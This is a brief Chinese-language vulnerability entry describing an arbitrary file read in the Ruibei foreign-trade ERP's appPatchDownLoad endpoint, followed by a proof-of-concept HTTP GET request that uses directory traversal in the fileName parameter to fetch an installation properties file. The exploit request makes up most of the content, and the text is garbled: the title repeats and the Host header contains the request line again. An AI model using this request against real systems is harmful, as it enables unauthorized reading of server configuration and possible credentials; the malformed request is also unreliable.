漏洞描述
睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞
睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞
PoC代码
GET /appPatchDownLoad?fileName=../../../../RebeeCRM/_RebeeCRM_installation/installvariables.properties HTTP/1.1
Host: GET /appPatchDownLoad?fileName=../../../../RebeeCRM/_RebeeCRM_installation/installvariables.properties HTTP/1.1
Host: